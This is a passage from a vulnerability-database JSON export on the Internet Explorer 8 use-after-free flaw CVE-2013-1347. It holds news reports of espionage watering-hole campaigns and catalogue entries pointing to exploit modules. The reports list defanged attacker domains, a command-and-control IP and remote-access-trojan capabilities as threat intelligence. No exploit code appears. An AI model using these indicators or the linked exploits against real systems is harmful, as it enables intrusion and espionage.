likely in order to launch further exploits. Blasco added that the command and control protocol used in the attack matches that of a Chinese espionage gang known as DeepPanda; other characteristics of this attack match those used against a Thai human rights nongovernment organization website.\n\nThe Poison Ivy RAT, meanwhile, is a backdoor that an attacker can use to remotely access compromised machines and add or delete files, edit Registry files, view or kill running processes, network connections and services, and add or delete applications. It can be used for espionage as well as some variants have the capability to start remote command shells, take screenshots, start audio or video recordings and drop keylogging software.", "published": "2013-05-06T11:14:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://threatpost.com/ie-8-zero-day-found-as-dol-watering-hole-attack-spreads-to-nine-other-sites/100212/", "cvelist": ["CVE-2012-4792", "CVE-2013-1347"], "lastseen": "2016-09-04T20:52:25"}, {"id": "OIL-ENERGY-WATERING-HOLE-ATTACKS-COULD-BE-TIED-TO-DOL-ATTACKS/102366", "type": "threatpost", "title": "Oil, Energy Watering Hole Attacks Linked to DOL attack", "description": "A string of watering hole attacks targeting oil and energy companies dating back to May could be linked to similar[ attacks against the U.S. Department of Labor website](<http://threatpost.com/watering-hole-attack-claims-us-department-of-labor-website/100081>).\n\nResearchers at Cisco discovered the [compromised domains of 10 oil and energy companies](<http://blogs.cisco.com/security/watering-hole-attacks-target-energy-sector/>) worldwide, including hydroelectric plants, natural gas distributors, industrial suppliers to the energy sector and investment firms serving those markets. Six of the 10 sites shared the same Web design firm and three of the six are owned by the same parent company. Cisco researcher Emmanuel Tacheau speculates that credentials at the Web design firm were stolen, leading to the compromises.\n\n### Related Posts\n\n#### [Threatpost News Wrap, September 2, 2016](<https://threatpost.com/threatpost-news-wrap-september-2-2016/120332/> \"Permalink to Threatpost News Wrap, September 2, 2016\" )\n\nSeptember 2, 2016 , 9:00 am\n\n#### [Insecure Redis Instances at Core of Attacks Against Linux Servers](<https://threatpost.com/insecure-redis-instances-at-core-of-attacks-against-linux-servers/120312/> \"Permalink to Insecure Redis Instances at Core of Attacks Against Linux Servers\" )\n\nSeptember 1, 2016 , 1:08 pm\n\n#### [Fairware Attacks Targeting Linux Servers](<https://threatpost.com/fairware-attacks-targeting-linux-servers/120254/> \"Permalink to Fairware Attacks Targeting Linux Servers\" )\n\nAugust 31, 2016 , 10:21 am\n\nThe 10 sites were exploited and serving iframe redirects to other sites hosting espionage malware, possibly the [Poison Ivy remote access Trojan](<http://threatpost.com/poison-ivy-rat-spotted-in-three-new-attacks/102022>).\n\n\u201cThe assumption is, with the target companies being in the energy sector, they were attempting to infect machines within that sector and exfiltrate intellectual property,\u201d Tacheau said.\n\nThe iframes load exploit code and malware from three compromised domains\u2014keeleux[.]com, kenzhebek[.], and nahoonservices[.]com. The exploits target primarily a Java vulnerability, [CVE-2012-1723](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1723>), or a flaw in Internet Explorer 8, [CVE-2013-1347](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1347>). A Firefox exploit was also found in these attacks, [CVE-2013-1690](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1690>).\n\nCisco said the malware used in the attacks is a Trojan that captures system configurations, as well as clipboard and keyboard data. It also establishes an encrypted connection to a command and control server hosted in Greece awaiting commands. All of the infected sites were notified and most had been cleaned up, Cisco said.\n\n\u201cDetection for the malware was extremely low, so that\u2019s always a concern,\u201d Tacheau said. \u201cFortunately, exploit detection for the exploits used is pretty good, so hopefully people will have been protected.\u201d\n\nWatering hole attacks are effective because they target websites of interest to the intended victim. In the past, government policy resource websites and mobile developer forums have been compromised in other watering hole attacks.\n\nAt the time of the Department of Labor attacks, also in May, the [IE 8 exploit was a zero-day ](<http://threatpost.com/ie-8-zero-day-found-as-dol-watering-hole-attack-spreads-to-nine-other-sites/100212>)and had infected the DOL\u2019s Site Exposure Matrices (SEM) website with javascript redirecting victims to the Poison Ivy RAT. The SEM website is a repository of data on toxic substances found at facilities run by the Department of Energy. At the time, security experts speculated the attackers were targeting DOE employees working on nuclear weapons programs.\n\nThe [IE vulnerability was patched in May](<http://threatpost.com/microsoft-patches-department-of-labor-pwn2own-ie-vulnerabilities/100633>), but not before those [attacks spread to nine other sites including the US Agency for International Development (USAID)](<http://threatpost.com/usaid-workers-also-targeted-by-dol-watering-hole-attackers/100528>) and research firms in Asia.\n\nGiven the timing of the two attacks and the use of the same Internet Explorer exploit, the Department of Labor attacks could be tied to the energy and oil attacks as well.\n\n\u201cThat\u2019s the million dollar question,\u201d Tacheau said. \u201cThere certainly are a lot of commonalities. If you combine the timing, the shared exploit and the sector targeted, it does seem at least suspiciously in favor of a semblance of attackers.\u201d\n\nThe oil and energy attacks, however, were found coincidentally by Cisco researchers looking at system logs and noticing the commonalities in the sectors targeted.\n\n\u201cIt boils down to a matter of volume,\u201d Tacheau said. \u201cThese were low volume-high stakes attacks; these sites don\u2019t attract a large number of visitors. The DOL attacks were different. When you have a high profile site like that, those are always going to be spotted off the bat.\u201d\n\n[_Image courtesy KenHodge13 Flickr_](<http://www.flickr.com/photos/40132991@N07/>)", "published": "2013-09-19T15:55:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://threatpost.com/oil-energy-watering-hole-attacks-could-be-tied-to-dol-attacks/102366/", "cvelist": ["CVE-2012-1723", "CVE-2013-1347", "CVE-2013-1690"], "lastseen": "2016-09-04T20:45:45"}, {"id": "IE-8-ZERO-DAY-POPS-UP-IN-TARGETED-ATTACKS-AGAINST-KOREAN-MILITARY-SITES/100728", "type": "threatpost", "title": "IE 8 0Day in Sunshop Targeted Espionage Malware Campaign", "description": "Lady Boyle seems to have an admirer.\n\nMalware named after a character in the Dishonored video game continues to pop up in targeted attacks against a number of high profile military and socially motivated websites. The latest surfaced about 10 days ago in an attack researchers at FireEye are calling the Sunshop Campaign.\n\n### Related Posts\n\n#### [ShadowBrokers\u2019 Leak Has \u2018Strong Connection\u2019 to Equation Group](<https://threatpost.com/shadowbrokers-leak-has-strong-connection-to-equation-group/119941/> \"Permalink to ShadowBrokers\u2019 Leak Has \u2018Strong Connection\u2019 to Equation Group\" )\n\nAugust 17, 2016 , 7:30 am\n\n#### [Attributing Advanced Attacks Remains Challenge For Researchers](<https://threatpost.com/attributing-advanced-attacks-remains-challenge-for-researchers/119508/> \"Permalink to Attributing Advanced Attacks Remains Challenge For Researchers\" )\n\nJuly 27, 2016 , 12:27 pm\n\n#### [Congressional Report: China Hacked FDIC And Agency Covered It Up](<https://threatpost.com/congressional-report-china-hacked-fdic-and-agency-covered-it-up/119276/> \"Permalink to Congressional Report: China Hacked FDIC And Agency Covered It Up\" )\n\nJuly 13, 2016 , 4:23 pm\n\nSunshop targeted a number of Korean military and political strategy websites, as well as a Uyghur forum among others with a pair of Java exploits and the recently [patched IE 8 vulnerability](<https://technet.microsoft.com/en-us/security/bulletin/ms13-038>) recently used against the U.S. Department of Labor and a number of other sites. The exploits were redirecting vulnerable visitors to sunshop[.]com[.]tw where a host of malware awaits including Lady Boyle, which has been deployed in other [attacks against the Uyghur](<https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=6&cad=rja&ved=0CFcQFjAF&url=http%3A%2F%2Fthreatpost.com%2Fmalware-arsenal-targets-tibetan-activists-040213%2F&ei=V7ybUZhgq7PRAdzagfAD&usg=AFQjCNGKZ8xrkJiBv_H9dqZlQdevNV6PgQ&sig2=E2KLpJnzNz4LttVm7aPl_A&bvm=bv.46865395,d.dmQ>), in particular, and in the [Winnti attacks](<http://threatpost.com/stolen-winnti-certificates-used-watering-hole-attack-against-tibet-orphans-site-041213/>).\n\n\u201cA number of different Chinese-based espionage threat attackers use that malware, so it\u2019s hard to use that indicator alone as a tie it to one particular threat actor,\u201d said Ned Moran, a researcher at FireEye. \u201cAt least 5 different groups are using that malware. It\u2019s a popular tool used by intrusion actors.\n\n\u201cBased on the sites compromised, there was a clear focus on Korean security and defense related issues,\u201d Moran said. \u201cThe attackers are looking for data around the Korean defense posture.\u201d\n\nThe group behind Sunshop was also behind a 2010 attack on the Nobel Prize website that took advantage of a zero-day in Firefox, FireEye said.\n\nThese attacks can be considered watering hole attacks since all the sites are popular with influential targets and have javascript exploits that redirect victims to espionage-type malware.\n\n\u201cThese sites are well trafficked and the attackers have a strong sense of the audiences of these sites,\u201d Moran said. \u201cThey compromise the sites and wait for traffic to come to them.\u201d\n\nThe Lady Boyle malware, which is a remote access Trojan, is being served from three different command and control servers in the Sunshop attacks. IE8 users who land on the compromised site are hit with an exploit for [CVE-2013-1347](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1347>) pulled in from hk[.]sz181[.]com connected to a C&C server at dns[.]homesvr[.]tk. The two Java exploits, meanwhile, exploit [CVE-2013-2423](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2423>) and [CVE-2013-1493](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1493>), both of which have been patched. All of the command and control servers, FireEye said, resolved to 58[.]64[.]205[.]53, used by another domain used to drop Briba malware, also known as the [IExplore RAT](<https://citizenlab.org/wp-content/uploads/2012/09/IEXPL0RE_RAT.pdf>) targeting NGOs.\n\n\u201cThis is a traditional RAT type of malware that provides access to a machine, runs commands, downloads victim data or uploads new executables to the victim, or runs shell commands,\u201d Moran said. In our experience, we have not seen it used outside this small set of intrusion actors; it\u2019s not commercially available. Whenever see it, tends show up in these types attacks, strategic espionage attacks.\u201d\n\nFireEye researchers also discovered a connection between the Sunshop[.]com[.]tw host and the PoisonIvy RAT used in a number of other targeted attacks.\n\n\u201cThat was the first time [Sunshop] was used as an exploit server; it\u2019s been in play for a few months,\u201d Moran said.", "published": "2013-05-21T14:40:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://threatpost.com/ie-8-zero-day-pops-up-in-targeted-attacks-against-korean-military-sites/100728/", "cvelist": ["CVE-2013-2423", "CVE-2013-1347", "CVE-2013-1493"], "lastseen": "2016-09-04T20:53:36"}], "packetstorm": [{"id": "PACKETSTORM:121542", "type": "packetstorm", "title": "Microsoft Internet Explorer CGenericElement Object Use-After-Free", "description": "", "published": "2013-05-07T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://packetstormsecurity.com/files/121542/Microsoft-Internet-Explorer-CGenericElement-Object-Use-After-Free.html", "cvelist": ["CVE-2013-1347"], "lastseen": "2016-12-05T22:19:06"}], "openvas": [{"id": "OPENVAS:803395", "type": "openvas", "title": "MS Internet Explorer Remote Code Execution Vulnerability (2847140)", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS13-038.", "published": "2013-05-06T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=803395", "cvelist": ["CVE-2013-1347"], "lastseen": "2017-07-02T21:11:19"}, {"id": "OPENVAS:1361412562310803395", "type": "openvas", "title": "MS Internet Explorer Remote Code Execution Vulnerability (2847140)", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS13-038.", "published": "2013-05-06T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803395", "cvelist": ["CVE-2013-1347"], "lastseen": "2018-04-06T11:23:15"}], "saint": [{"id": "SAINT:530FA87FA097C35D9629E058CE3C1589", "type": "saint", "title": "Internet Explorer CGenericElement Object Use-after-free Vulnerability", "description": "Added: 05/08/2013 \nCVE: [CVE-2013-1347](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1347>) \nBID: [59641](<http://www.securityfocus.com/bid/59641>) \nOSVDB: [92993](<http://www.osvdb.org/92993>) \n\n\n### Background\n\n[Internet Explorer](<http://www.microsoft.com/windows/ie>) is an HTML web browser which comes by default on Microsoft operating systems. \n\n### Problem\n\nWhen Internet Explorer attempts to access an object in memory that has been deleted, it may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. This use-after-free vulnerability is triggered when handling CGenericElement objects. \n\n### Resolution\n\nApply the patch referenced in [Microsoft Security Bulletin 13-028](<https://technet.microsoft.com/en-us/security/bulletin/ms13-028>). \n\n### References\n\n<http://technet.microsoft.com/en-us/security/advisory/2847140> \n<https://technet.microsoft.com/en-us/security/bulletin/ms13-028> \n\n\n### Limitations\n\nThis exploit was tested against Microsoft Internet Explorer 8 on Microsoft Windows XP SP3 English (DEP OptIn) and Microsoft Windows 7 SP1 (DEP OptIn). \n\nSuccessful exploit on Windows 7 requires that JRE 6 be installed. \n\n### Platforms\n\nWindows \n \n\n", "published": "2013-05-08T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/ie_cgenericelement_memory_corruption", "cvelist": ["CVE-2013-1347"], "lastseen": "2016-12-14T16:58:04"}, {"id": "SAINT:3EF0C66878E70BB3C355385365B1DFBF", "type": "saint", "title": "Internet Explorer CGenericElement Object Use-after-free Vulnerability", "description": "Added: 05/08/2013 \nCVE: [CVE-2013-1347](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1347>) \nBID: [59641](<http://www.securityfocus.com/bid/59641>) \nOSVDB: [92993](<http://www.osvdb.org/92993>) \n\n\n### Background\n\n[Internet Explorer](<http://www.microsoft.com/windows/ie>) is an HTML web browser which comes by default on Microsoft operating systems. \n\n### Problem\n\nWhen Internet Explorer attempts to access an object in memory that has been deleted, it may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. This use-after-free vulnerability is triggered when handling CGenericElement objects. \n\n### Resolution\n\nApply the patch referenced in [Microsoft Security Bulletin 13-028](<https://technet.microsoft.com/en-us/security/bulletin/ms13-028>). \n\n### References\n\n<http://technet.microsoft.com/en-us/security/advisory/2847140> \n<https://technet.microsoft.com/en-us/security/bulletin/ms13-028> \n\n\n### Limitations\n\nThis exploit was tested against Microsoft Internet Explorer 8 on Microsoft Windows XP SP3 English (DEP OptIn) and Microsoft Windows 7 SP1 (DEP OptIn). \n\nSuccessful exploit on Windows 7 requires that JRE 6 be installed. \n\n### Platforms\n\nWindows \n \n\n", "published": "2013-05-08T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/ie_cgenericelement_memory_corruption", "cvelist": ["CVE-2013-1347"], "lastseen": "2016-10-03T15:02:01"}, {"id": "SAINT:ADB3400FCF70345A44024ACACFAE55FE", "type": "saint", "title": "Internet Explorer CGenericElement Object Use-after-free Vulnerability", "description": "Added: 05/08/2013 \nCVE: [CVE-2013-1347](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1347>) \nBID: [59641](<http://www.securityfocus.com/bid/59641>) \nOSVDB: [92993](<http://www.osvdb.org/92993>) \n\n\n### Background\n\n[Internet Explorer](<http://www.microsoft.com/windows/ie>) is an HTML web browser which comes by default on Microsoft operating systems. \n\n### Problem\n\nWhen Internet Explorer attempts to access an object in memory that has been deleted, it may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. This use-after-free vulnerability is triggered when handling CGenericElement objects. \n\n### Resolution\n\nApply the patch referenced in [Microsoft Security Bulletin 13-028](<https://technet.microsoft.com/en-us/security/bulletin/ms13-028>). \n\n### References\n\n<http://technet.microsoft.com/en-us/security/advisory/2847140> \n<https://technet.microsoft.com/en-us/security/bulletin/ms13-028> \n\n\n### Limitations\n\nThis exploit was tested against Microsoft Internet Explorer 8 on Microsoft Windows XP SP3 English (DEP OptIn) and Microsoft Windows 7 SP1 (DEP OptIn). \n\nSuccessful exploit on Windows 7 requires that JRE 6 be installed. \n\n### Platforms\n\nWindows \n \n\n", "published": "2013-05-08T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/ie_cgenericelement_memory_corruption", "cvelist": ["CVE-2013-1347"], "lastseen": "2017-01-10T14:03:44"}], "exploitdb": [{"id": "EDB-ID:25294", "type": "exploitdb", "title": "Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability. CVE-2013-1347. Remote exploit for windows platform", "published": "2013-05-07T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/25294/", "cvelist": ["CVE-2013-1347"], "lastseen": "2016-02-03T01:03:30"}], "zdt": [{"id": "1337DAY-ID-20741", "type": "zdt", "title": "Microsoft Internet Explorer CGenericElement Object Use-After-Free", "description": "This Metasploit module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "2013-05-07T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://0day.today/exploit/description/20741", "cvelist": ["CVE-2013-1347"], "lastseen": "2018-04-05T23:48:05"}]}}
